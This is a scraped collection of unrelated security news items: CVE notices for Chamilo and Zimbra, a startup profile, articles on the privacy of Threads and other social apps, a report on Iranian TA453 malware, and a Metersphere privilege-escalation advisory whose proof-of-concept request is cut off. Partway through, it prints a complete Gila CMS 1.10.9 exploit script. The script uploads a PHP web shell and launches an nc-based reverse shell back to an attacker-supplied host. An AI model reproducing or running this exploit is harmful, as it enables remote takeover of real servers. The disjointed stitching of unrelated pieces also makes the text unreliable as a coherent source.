Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the skills wheel.

CVE-2023-37066: Security issues - Chamilo LMS

Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the session category management section.

CVE-2023-37065: Security issues - Chamilo LMS

The company, one of four finalists in Black Hat USA's 2023 startup competition, looks for the vulnerabilities an attacker could actually access.

As the Log4j vulnerability demonstrated in a visceral way, open source code is inextricable from modern software. Developers incorporate components, snippets, and libraries from sources like GitHub when writing their own programs so they don't have to reinvent the wheel every time they build a cart. But that means most software has dependencies even its developers don't know about, which can lead to not realizing when a vulnerability report applies to their mission-critical applications — or to scrambling to fix a severe vulnerability that is completely cut off from any source code and thus harmless.

"With 90% of code in modern applications being open source and 95% of vulnerabilities being found in transitive dependencies \[the software packages automatically brought in by OSS\], security teams struggle to prioritize the right risks for engineering to work on," says Endor Labs CEO and co-founder Varun Badhwar. And that's the company's focus: prioritizing risk across open source software, CI/CD pipelines, and secrets.

Endor does this using dependency life cycle management, which takes into account a variety of metrics to calculate an overall risk score that a company can use to set security policies. It emphasizes how a dependency is used in the organization rather than the severity of a vulnerability. Even the worst vuln, the thinking goes, doesn't matters if an attacker can't actually get to it.

**Why Reachability Analysis?**

The company calls its approach "reachability analysis." By building a complete inventory of software and then tracing every path to a vulnerability, Endor says it can determine which vulnerabilities need to be fixed right away and which can be set aside. Users can query the Endor Labs platform using DroidGPT, a chatbot that is now in beta, to figure out which open source package they can use in place of a more vulnerable one.

Where Endor really stands out, Badhwar says, is with its staff: A third of the R&D team have earned doctorates. The focus on specialization carries through to the company's "decision to tackle one problem at a time to solve it in the right way," he says.

    

DroidGPT search results for cryptographic packages in Go. (Source: Endor Labs)

That first problem was open source dependencies. "We made the decision to start there and invest heavily in reachability analysis before we move forward into other solutions," Badhwar says.

The next focus areas will be prioritized secret scanning and supply chain management/configuration posture management, he adds.

**Return of the Contest**

The four finalists in the Black Hat Startup Spotlight — Endor Labs, Gomboc, Binarly, and Mobb — will present their business models to a panel of judges at the Mandalay Bay in Las Vegas on Wednesday, Aug. 9. (Of the finalists, Endor Labs is the only one that also made the finals at the 2023 RSAC Innovation Sandbox.) Dark Reading's editor-in-chief, Kelly Jackson Higgins, will host the event, which begin at 4:30 p.m. PT.

If you're attending Black Hat in person, Endor Labs hopes to attract you to its booth with a platform demo, a cute mascot, and Star Wars keychain/bottle openers. You might also get an invite to Endor Labs' event at the Topgolf driving range and sports bar.

Speaking of Endor, the swag is a clue to the inspiration for the company's name. No, it doesn't refer to the Canaanite village where the biblical Saul consulted a witch. In this case, Endor is the forest moon in the Star Wars universe where Ewoks live. The company's security research team is even named "Station 9" after a research station on Endor.

As Badhwar says, "The story behind the name is simple — we're just huge nerds."

**Speed Round**

**Website:** https://www.endorlabs.com/  
**Founded:** 2022  
**Funding stage:** Seed  
**Total funding raised so far:** $25M  
**Number of employees:** 50  
**If the company were a band, what would its band name be, and what kind of band would it be:** "We would simply be named The Ewoks and play futuristic synth-rock."  
**Pineapple on pizza, yea or nay?:** "We posted this question to the company Slack, and it almost sparked a civil war, but the result was an exact 50/50 split, which our marketing team will break and decide YES on pineapple on pizza." — Thuy Nguyen, director of demand generation at Endor Labs

Startup Spotlight: Endor Labs Focuses on Reachability

Gila CMS version 1.10.9 suffers from a remote code execution vulnerability.

    # Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)# Date: 05-07-2023# Exploit Author: Omer Shaik (unknown_exploit)# Vendor Homepage: https://gilacms.com/# Software Link: https://github.com/GilaCMS/gila/# Version: Gila 1.10.9# Tested on: Linuximport requestsfrom termcolor import coloredfrom urllib.parse import urlparse# Print ASCII artascii_art = """ ██████╗ ██╗██╗      █████╗      ██████╗███╗   ███╗███████╗    ██████╗  ██████╗███████╗██╔════╝ ██║██║     ██╔══██╗    ██╔════╝████╗ ████║██╔════╝    ██╔══██╗██╔════╝██╔════╝██║  ███╗██║██║     ███████║    ██║     ██╔████╔██║███████╗    ██████╔╝██║     █████╗  ██║   ██║██║██║     ██╔══██║    ██║     ██║╚██╔╝██║╚════██║    ██╔══██╗██║     ██╔══╝  ╚██████╔╝██║███████╗██║  ██║    ╚██████╗██║ ╚═╝ ██║███████║    ██║  ██║╚██████╗███████╗ ╚═════╝ ╚═╝╚══════╝╚═╝  ╚═╝     ╚═════╝╚═╝     ╚═╝╚══════╝    ╚═╝  ╚═╝ ╚═════╝╚══════╝                              by Unknown_Exploit"""print(colored(ascii_art, "green"))# Prompt user for target URLtarget_url = input("Enter the target login URL (e.g., http://example.com/admin/): ")# Extract domain from target URLparsed_url = urlparse(target_url)domain = parsed_url.netloctarget_url_2 = f"http://{domain}/"# Prompt user for login credentialsusername = input("Enter the email: ")password = input("Enter the password: ")# Create a session and perform loginsession = requests.Session()login_payload = {    'action': 'login',    'username': username,    'password': password}response = session.post(target_url, data=login_payload)cookie = response.cookies.get_dict()var1 = cookie['PHPSESSID']var2 = cookie['GSESSIONID']# Prompt user for local IP and portlhost = input("Enter the local IP (LHOST): ")lport = input("Enter the local port (LPORT): ")# Construct the payloadpayload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f"payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}"# Perform file upload using POST requestupload_url = f"{target_url_2}fm/upload"upload_headers = {    "Host": domain,    "Content-Length": "424",    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2",    "Accept": "*/*",    "Origin": target_url_2,    "Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess",    "Accept-Encoding": "gzip, deflate",    "Accept-Language": "en-US,en;q=0.9",    "Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}",    "Connection": "close"}upload_data = f'''------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7"Content-Type: application/x-php<?php system($_GET["cmd"]);?>------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="path"tmp------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="g_response"content------WebKitFormBoundarynKy5BIIJQcZC80i2--'''upload_response = session.post(upload_url, headers=upload_headers, data=upload_data)if upload_response.status_code == 200:    print("File uploaded successfully.")    # Execute payload    response = session.get(payload_url)    print("Payload executed successfully.")else:    print("Error uploading the file:", upload_response.text)

Gila CMS 1.10.9 Remote Code Execution

Want to try out Meta’s new social media app? Here’s more context on what personal data is collected by Threads and similar social media apps.

Meta's long-awaited Twitter alternative is here, and it's called Threads. The new social media app launches at a time when alternatives, like Bluesky, Mastodon, and Spill, are vying for users who are dissatisfied with Elon Musk's handling of Twitter's user experience, with its newly introduced rate limits and an uptick in hate speech.

Meta owns Facebook, Instagram, and WhatsApp, so the company’s attempt to recreate an online experience similar to Twitter is likely to attract plenty of normies, lurkers, and nomadic shitposters. Threads uses the AT Protocol developed by Bluesky, and Meta is working to incorporate Threads as part of the online Fediverse, a group of shared servers where users can interact across multiple platforms.

If you’re hesitant to share your personal data with a company on the receiving end of a billion dollar fine, that’s understandable. For those who are curious, however, here’s what we know about the service’s privacy policy, what data you hand over when you sign up, and how it compares to the data collected by other options.

Threads

Threads (Android, Apple) potentially collects a wide assortment of personal data that remains connected to you, based on the information available in Apple’s App Store, from your purchase history and physical address to your browsing history and health information. “Sensitive information” is also listed as a type of data collected by the Threads app. Some information this could include is your race, sexual orientation, pregnancy status, and religion as well as your biometric data.

Threads falls under the larger privacy policy covering Meta’s other social media platforms. Want to see the whole thing? You can read it for yourself here. There’s one caveat, though. The app has a supplemental privacy policy that’s also worth reading. A noteworthy detail from this document is that while you’re able to deactivate your Threads account whenever, you must delete your Instagram if you fully want to delete your Threads account.

Below is all the data collected by Threads that’s mentioned in the App Store. Do you have the Facebook or Instagram app on your phone? Keep in mind that this data collection by Meta is comparable to the data those apps collect about you.

For Android users, the Google Play Store doesn’t require you to hand over the same amount of extensive data to try out Threads. You have more control than Apple users, since you can granularly toggle what personal data is shared with apps.

Data Linked to You

**Third-Party Advertising:**

*   _Purchases_ (Purchase History)
*   _Financial Info_ (Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   _Contacts_
*   _User Content_ (Photos or Videos, Gameplay Content, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

**Developer's Advertising or Marketing:**

*   _Purchases_ (Purchase History)
*   _Financial Info_ (Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   _Contacts_
*   _User Content_ ( Photos or Videos, Gameplay Content, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

**Analytics:**

*   _Health & Fitness_ (Health, Fitness)
*   _Purchases_ (Purchase History, Financial Info, Payment Info, Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   Contacts
*   _User Content_ (Photos or Videos, Audio Data, Gameplay Content, Customer Support, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Sensitive Info_
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

**Product Personalization:**

*   _Purchases_ (Purchase History)
*   _Financial Info_ (Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   Contacts
*   _User Content_ (Photos or Videos, Gameplay Content, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Sensitive Info_
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

**App Functionality:**

*   _Health & Fitness_ (Health, Fitness)
*   _Purchases_ (Purchase History)
*   _Financial Info_ (Payment Info, Credit Info, Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   _Contacts_
*   _User Content_ (Emails or Text Messages, Photos or Videos, Audio Data, Gameplay Content, Customer Support, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Sensitive Info_
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

**Other Purposes:**

*   _Purchases_ (Purchase History)
*   _Financial Info_ (Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   _Contacts_
*   _User Content_ (Photos or Videos, Gameplay Content, Customer Support, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

Bluesky

Looking for an app that collects less personal data? Bluesky (Android, Apple) is a buzzy Twitter alternative started by Twitter founder Jack Dorsey and managed by CEO Jay Graber. Bluesky uses the AT Protocol that it created. Like Mastodon already does and Threads soon will, Bluesky incorporates the Fediverse servers as its backbone. The app is currently invite-only, but it does not currently collect anywhere near as much information as Threads or Twitter.

For Bluesky, the data that’s linked to you is focused on app functionality, like remembering your email and user ID, or access to photos and videos on your device so you can post memes. Here’s where you can find more info about Bluesky’s privacy policy. Keep in mind the service is still new and adding features, so there will likely be changes as it evolves.

Below is all the data collected by Bluesky that’s mentioned in the App Store. (Remember that this is only for iPhone owners. If you use an Android smartphone, you have more control over what data is shared.)

Data Linked to You

**App Functionality:**

*   _Contact Info_ (Email Address)
*   _User Content_ (Photos or Videos, Customer Support, Other User Content)
*   _Identifiers_ (User ID)

Data Not Linked to You

**Analytics:**

*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)

**App Functionality:**

*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)

Mastodon

What if you want a social media app that doesn’t suck up all your personal data? **Mastodon** (Android, Apple) might be a good option for you. Originally launched in 2016 by Eugen Rochko, Mastodon uses a decentralized protocol that’s different from Threads and Bluesky, called ActivityPub. It’s part of the Fediverse of shared servers. Mastodon is not exactly a new pick; it has positioned itself for years as an alternative to Twitter. (Remember, 2023 isn’t the first time users have considered ditching Twitter for something new and exciting.)

Are you trying it out for the first time? Here’s a great guide to getting started on Mastodon. There’s a bit of a learning curve with this one.

Below is all the data collected by Mastodon that’s mentioned in the App Store.

_\*In the style of Taylor Swift.\*_

\[Blank Space\]

That's right, the Mastodon app for iOS won't collect any data from your device. For Android owners, the app may share your name and email address with other companies.

If you don't like the official Mastodon apps for any reason, you can always try alternative apps with unique interfaces and features. Just be on the lookout for the privacy policies and data collection for those apps, since they don't have to commit to zero-data collection the way the official ones do.

Spill

Are you part of (or a fan of) Black Twitter and on the search for a new posting platform, preferably one that’s inclusive and voicey? Spill (Apple) is a Black-owned social media app that’s made with diverse communities in mind, specifically people of color. It was founded by Alphonzo “Phonz” Terrell and Devaris Brown, who both used to work at Twitter, and it launched earlier this year. Spill is not part of the Fediverse of shared servers.

Spill is currently invite-only, but you can sign up for the waiting list. While Spill does gather sensitive info, the other aspects of its data collection are not as extensive as Threads. Here’s the full privacy policy you can read over.

Below is all the data collected by Spill that’s mentioned in the App Store. It’s worth noting that Spill’s dev team is working on an Android app, but it’s not yet available to use.

Data Linked to You

**Developer's Advertising or Marketing:**

*   _Location_ (Coarse Location)
*   _Contact Info_ (Email Address, Name, Phone Number)
*   _User Content_ (Emails or Text Messages, Photos or Videos, Audio Data)
*   _Sensitive Info_

**Analytics:**

*   _Location_ (Coarse Location)
*   _Contact Info_ (Email Address, Name, Phone Number)
*   _User Content_ (Emails or Text Messages, Photos or Videos, Audio Data)
*   _Sensitive Info_

**Product Personalization:**

*   _Location_ (Coarse Location)
*   _Contact Info_ (Email Address, Name, Phone Number)
*   _Contacts_
*   _User Content_ (Emails or Text Messages, Photos or Videos, Audio Data)
*   _Sensitive Info_

**App Functionality:**

*   _Location_ (Coarse Location)
*   _Contact Info_ (Email Address, Name, Phone Number)
*   _Contacts_
*   _User Content_ (Emails or Text Messages, Photos or Videos, Audio Data)
*   _Sensitive Info_

**Other Purposes:**

*   _Contact Info_ (Email Address, Phone Number)

Hive Social

It’s a bit smaller than other platforms, but Hive Social (Android, Apple) is another contender for your attention span that’s particularly popular with gamers. This app is not part of the Fediverse. Nostalgic for the days when curated music would automatically play when a person visited your profile? This feature is one way Hive differentiates itself from Twitter, along with a built-in Q&A feature that lets your followers ask you questions (sometimes anonymously) that you can answer in posts to your feed. Want to give Hive a try? Check out our guide with tips for getting started.

The app collects information about you for functionality and analytics, but it’s not connected specifically to you. Learn more about what data the app uses by taking a look at its privacy policy.

Below is all the data collected by Hive Social that’s mentioned in the App Store for iPhone owners. (Have a Google Pixel or other Android device in your pocket? You can go into your privacy settings for more control over what data Hive collects.)

Data Not Linked to You

**Analytics:**

*   _Contact Info_ (Email Address, Name, Phone Number)
*   _User Content_ (Photos or Videos, Customer Support, Other User Content)
*   _Identifiers_ (User ID)
*   _Usage Data_ (Product Interaction, Other Usage Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)

**App Functionality:**

*   _Contact Info_ (Email Address, Name, Phone Number)
*   _User Content_ (Photos or Videos, Customer Support, Other User Content)
*   _Identifiers_ (User ID)
*   _Usage Data_ (Product Interaction, Other Usage Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)

What About Twitter?

It may seem like Threads collects a ton of personal data. (Because it does!) For more context, let’s go over what Twitter asks for as well. Twitter (Android, Apple) keeps plenty of data that’s linked to users and used to track you, like your purchase history and browsing history. With that in mind, the app does not list “sensitive information” as one of the disclosed categories of data collection. Check out its full privacy policy for an in-depth breakdown.

Below is all the data collected by Twitter that’s mentioned in the App Store. (Escaped from Apple’s walled garden? The Android app for Twitter still collects some personal data, like your precise location and web browsing history, unless you adjust your privacy settings.)

Data Used to Track You

*   _Purchases_ (Purchase History)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Email Address)
*   _User Content_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data)

Data Linked to You

**Third-Party Advertising:**

*   _Purchases_ (Purchase History)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Email Address)
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data)
*   _Diagnostics_ (Performance Data)

**Developer's Advertising or Marketing:**

*   _Purchases_ (Purchase History)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Email Address)
*   _User Content_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data)

**Analytics:**

*   _Purchases_ (Purchase History)
*   _Location_ (Precise Location, Coarse Location)
*   _Contacts_
*   _User Content_ (Photos or Videos, Audio Data, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data)
*   _Diagnostics_ (Crash Data, Performance Data)

**Product Personalization:**

*   _Purchases_ (Purchase History)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Email Address, Phone Number)
*   _Contacts_
*   _User Content_
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)

**Other Purposes:**

*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Email Address, Name, Phone Number)
*   _Contacts_
*   _User Content_ (Photos or Videos)
*   Search History
*   _Identifiers_ (User ID)

Data Not Linked to You

**Third-Party Advertising:**

*   _Other Data_

**Developer's Advertising or Marketing:**

*   _Other Data_

**Analytics:**

*   _User Content_ (Emails or Text Messages)
*   _Other Data_

**App Functionality:**

*   _Contact Info_ (Physical Address)
*   _User Content_ (Emails or Text Messages)
*   _Other Data_

How Threads' Privacy Policy Compares to Twitter's (and Its Rivals')

Meta’s Twitter alternative promises that it will work with decentralized platforms, giving you greater control of your data. You can hold the company to that—if you don't sign up.

As Meta’s Twitter competitor, Threads, started generating buzz ahead of yesterday’s launch, curious netizens spotted a placeholder listing for the app in Apple’s App Store. Like all iOS apps, the listing included details about the user data the app is designed to collect and track. And observers couldn’t help but notice that this brand-new app was already listing a whopping 14 categories of data that “may be collected and linked to your identity.” 

It might be a jarring reminder, but this is par for the course with Meta-owned apps, which the company monetizes by selling targeted ads and personalized marketing. Facebook and Instagram’s iOS apps list even more categories than Threads, the Messenger app lists about as many, and even the secure messaging app WhatsApp discloses nine categories of “Data Linked to You.” So for people fed up with Twitter’s rapidly deteriorating platform (and vibes), a Meta-owned alternative—with its predictability and relative stability—could even potentially appeal to those who are generally concerned about data privacy. 

Early data suggests as much: Threads, which is directly linked to users’ Instagram accounts, saw 10 million sign-ups in its first seven hours, according to CEO Mark Zuckerberg. Ultimately, Meta’s pitch for Threads is simply that it’s the devil you know.

But one thing is different this time: Meta is dangling an opportunity to essentially be on Threads without signing up for the platform at all. The company announced yesterday that it is planning to make Threads interoperable with other, non-Meta social networks that support a decentralized protocol already used by WordPress and 2022’s decentralization poster child, Mastodon. This means that if Meta follows through, you’ll be able to see and interact with Threads content from other platforms and services that support the standard, which is known as ActivityPub.

Meta says that Threads will start supporting ActivityPub “soon,” a descriptor that doesn’t necessarily inspire confidence. The company has already spent years, for example, working on its longtime promise of default end-to-end encryption on Messenger. But incorporating decentralization into Threads, and specifically supporting ActivityPub, has reportedly been a core aspect of Meta’s vision for the app from the beginning. Meta has also already sketched out details of the plan in its supplemental privacy policy for Threads.

All of this means that if you’re sick of Meta’s data-gobbling ways, or you don’t already have an Instagram account and don’t want to get one, you actually have some leverage: Don’t join Threads. Use Mastodon or another ActivityPub platform until Threads comes to you. Or hang out on Bluesky, which doesn’t support ActivityPub but is working on its own vision of a decentralized, portable social network.

“The fact that large platforms are adopting ActivityPub is not only validation of the movement towards decentralized social media, but a path forward for people locked into these platforms to switch to better providers. Which in turn, puts pressure on such platforms to provide better, less exploitative services," Mastodon CEO Eugen Rochko wrote in a blog post ahead of yesterday’s Threads launch.

Easy examples of decentralized services you already intuitively understand are phones and email. You can call anyone on any number, even if you and the person you’re calling buy phone service from different companies. Same with email. Even if pretty much everyone you know uses Gmail, there’s nothing materially different about emailing with the Yahoo and Hotmail holdouts in your life. And maybe your friend Jane runs her own email server and her address is jane@janerox.com. Love that for you, Jane—doesn’t change anything for anyone else.

That’s it. That’s how “the fediverse,” or federated services, work too. You join a server, and you’re trusting that server with your data. But then you can communicate with all the other servers running the same protocol, and the only data everyone on all those other servers can see from you is the content you choose to put out there. So Gmail has all of your emails and usage history, and Jane has all of her own emails and usage history, but the only data she has about you on her server is the emails you’ve sent her. And the only data Gmail has about Jane comes from her interactions with you and any other Gmail users.

Decentralization doesn’t change the basic functions of a social network, and that’s fine. The whole point of these services is to be a platform for publicly posting and consuming information. They aren’t designed around implementing end-to-end encryption. The servers still have access to user data and can be subpoenaed by governments or hacked. But decentralization creates a model through which users can elect to entrust their information to servers based on which ones have less-predatory data practices.

Ross Schulman, senior fellow for decentralization at digital rights nonprofit the Electronic Frontier Foundation, notes that if Threads emerges as a massive player in the fediverse, there could be concerns about what he calls “social graph slurping." Meta will know who all of their users interact with and follow within Threads, and it will also be able to see who their users follow in the broader fediverse. And if Threads builds up anywhere near the reach of other Meta platforms, just this little slice of life would give the company a fairly expansive view of interactions beyond its borders.

“I am perhaps equal parts excited and apprehensive to see how things play out with Threads, but it is really underlining the beauty of the fediverse that you have every option and the opportunity to choose,” Schulman says. “If you like Meta and you want to be in there, great. Go join Threads, you’ll be happy there, and you’ll also have access to everything else. If you don’t want to be a part of Meta, but you’ve got friends or family that do or public figures or whatever, then fine. You can get an account on any number of other fediverse servers and then follow the people that you want. Or if you want nothing to do at all with Meta, then there are plenty of servers out there \[that\] have already announced that they're preemptively blocking Threads. So you can live that life, too.”

No matter who you throw your lot in with, an important concept is that the server you choose is still going to have access to your data, even though all the other servers don’t. If Threads implements ActivityPub and you use it to interact with the fediverse, you’re choosing Meta as your server and everything that comes with that. If you run your own server, like Jane, you can retain full control. But if you’re somewhere in the middle and use a server run by someone else, you need to keep an eye out for future changes. Mastodon is currently a crowdfunded platform, but it’s largely unclear what the business model will be for decentralized services like Bluesky. And future pivots could mean that your server eventually implements more user-monitoring or data-tracking practices. Then it might be time to move on—a process made easier by the portability that's built into the fediverse, allowing you to switch servers while maintaining your connections.

If you’re a Twitter user, or used to be, you have already dealt with a service that makes dramatic changes and completely upends your expectations and trust. But the Twitter case study illustrates a crucial idea. From a data privacy perspective, the worst-case scenario is no worse in the world of decentralization, the best-case scenario is much better, and, for once, you get a say in where you end up.

Don't Join Threads—Make Instagram's 'Twitter Killer' Join You

The Iranian nation-state actor known as TA453 has been linked to a new set of spear-phishing attacks that infect both Windows and macOS operating systems with malware.
"TA453 eventually used a variety of cloud hosting providers to deliver a novel infection chain that deploys the newly identified PowerShell backdoor GorjolEcho," Proofpoint said in a new report.
"When given the opportunity, TA453

Endpoint Security / Malware

The Iranian nation-state actor known as TA453 has been linked to a new set of spear-phishing attacks that infect both Windows and macOS operating systems with malware.

"TA453 eventually used a variety of cloud hosting providers to deliver a novel infection chain that deploys the newly identified PowerShell backdoor GorjolEcho," Proofpoint said in a new report.

"When given the opportunity, TA453 ported its malware and attempted to launch an Apple flavored infection chain dubbed NokNok. TA453 also employed multi-persona impersonation in its unending espionage quest."

TA453, also known by the names APT35, Charming Kitten, Mint Sandstorm, and Yellow Garuda, is a threat group linked to Iran's Islamic Revolutionary Guard Corps (IRGC) that has been active since at least 2011. Most recently, Volexity highlighted the adversary's use of an updated version of a Powershell implant called CharmPower (aka GhostEcho or POWERSTAR).

In the attack sequence discovered by the enterprise security firm in mid-May 2023, the hacking crew sent phishing emails to a nuclear security expert at a U.S.-based think tank focused on foreign affairs that delivered a malicious link to a Google Script macro that would redirect the target to a Dropbox URL hosting a RAR archive.

Present within the file is an LNK dropper that kicks off a multi-stage procedure to ultimately deploy GorjolEcho, which, in turn, displays a decoy PDF document, while covertly awaiting next-stage payloads from a remote server.

But upon realizing that the target is using an Apple computer, TA453 is said to have tweaked its modus operandi to send a second email with a ZIP archive embedding a Mach-O binary that masquerades as a VPN application, but in reality, is an AppleScript that reaches out to a remote server to download a Bash script-based backdoor called NokNok.

UPCOMING WEBINAR

🔐 Privileged Access Management: Learn How to Conquer Key Challenges

Discover different approaches to conquer Privileged Account Management (PAM) challenges and level up your privileged access security strategy.

Reserve Your Spot

NokNok, for its part, fetches as many as four modules that are capable of gathering running processes, installed applications, and system metadata as well as setting persistence using LaunchAgents.

The modules "mirror a majority of the functionality" of the modules associated with CharmPower, with NokNok sharing some source code overlaps with macOS malware previously attributed to the group in 2017.

Also put to use by the actor is a bogus file-sharing website that likely functions to fingerprint visitors and act as a mechanism to track successful victims.

"TA453 continues to adapt its malware arsenal, deploying novel file types, and targeting new operating systems," the researchers said, adding the actor "continues to work toward its same end goals of intrusive and unauthorized reconnaissance" while simultaneously complicating detection efforts.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Iranian Hackers' Sophisticated Malware Targets Windows and macOS Users

Meta's answer to Twitter went live and quickly racked up millions of members — but the social media app's privacy practices are under the microscope.

A full 20 million people (and counting) had signed up for Meta's Twitter competitor within hours of its launch Wednesday evening — but none of those users will be in the European Union, thanks to data privacy concerns.

Instagram Threads collects a wide range of data from users, according to its "App Privacy" blurb on the Apple App Store, including health information, purchase histories, financial data, location, contact lists, search and browsing history, usage data, and a somewhat ominous category of data listed as simply "sensitive info."

Officials at Meta, which was just slapped with a record-breaking $1.3 billion fine for violating the EU's GDPR law on data privacy, told the Irish Independent that it's holding off on the rollout of the service "for now," citing a lack of clarity around the EU's Digital Markets Act, which governs how companies use behavioral advertising and various data sources.

Instagram CEO Adam Mosseri is also on record as acknowledging "complexities with complying with some of the laws coming into effect next year."

    

Source: Instagram via the Apple App Store.

Aaron Mendes, CEO and co-founder of PrivacyHawk, noted in a statement sent to Dark Reading that Threads' data collection policies are intertwined with those of Instagram, and largely follow the same pattern with regard to using that data for targeted advertising, algorithm tweaking, and more. But, he noted, users do have some control.

"It is a reminder of the depth of data Meta collects on its users and that you are the product when you use any of their services," he said. "If you will use them and care about your privacy, take the time to go into their privacy settings and select more private settings than the default. And don't give them access to everything they ask for. And take back things they don’t need anymore. You can still use most of their services without giving them everything they want."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Privacy Woes Hold Up Global Instagram Threads Launch

An issue in Zimbra Collaboration ZCS v.8.8.15 and v.9.0 allows an attacker to execute arbitrary code via the sfdc_preauth.jsp component.

CVE-2023-29382: Security Center - Zimbra :: Tech Center

Metersphere is an open source continuous testing platform. In versions prior to 2.10.2 LTS, some key APIs in Metersphere lack permission checks. This allows ordinary users to execute APIs that can only be executed by space administrators or project administrators. For example, ordinary users can be updated as space administrators. Version 2.10.2 LTS has a patch for this issue.

**Summary**

目前metersphere 一些关键的API缺少了权限检查，比如workspace中的/setting/workspace/member/update，/setting/user/special/ws/member/add, /special/ws/member/delete/{workspaceId}/{userId} 以及project相关的API。

**PoC**

以workspace中的/setting/workspace/member/update利用为例

1 user1 是workspace1的空间管理员

2 user2 是workspace1的成员

3 user1 更新user2的信息，比如将其更新为空间管理员

4 使用burpsuite拦截请求

    以workspace中的/setting/workspace/member/update 为例
    
    POST /setting/workspace/member/update HTTP/1.1
    Host: 192.168.213.128:8081
    Content-Length: 144
    Accept-Language: zh-CN
    WORKSPACE: bd6fc04b-15af-43dc-8cb6-411deaec81a7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
    Content-Type: application/json
    Accept: application/json, text/plain, */*
    CSRF-TOKEN: 7wl7UAaQcpdQ+lolQXV1WYWQ+BLvd2bx2BQS22BoFb3UGqDlIbQjbELrNWgOzLgfc4YPf6nSUgllo/qpOudisg==
    X-AUTH-TOKEN: 52d843aa-8791-43be-a191-f04f975f2be2
    PROJECT: 2d2c879f-3f78-4701-aa6f-35aeedc25069
    Origin: http://192.168.213.128:8081
    Referer: http://192.168.213.128:8081/
    Accept-Encoding: gzip, deflate
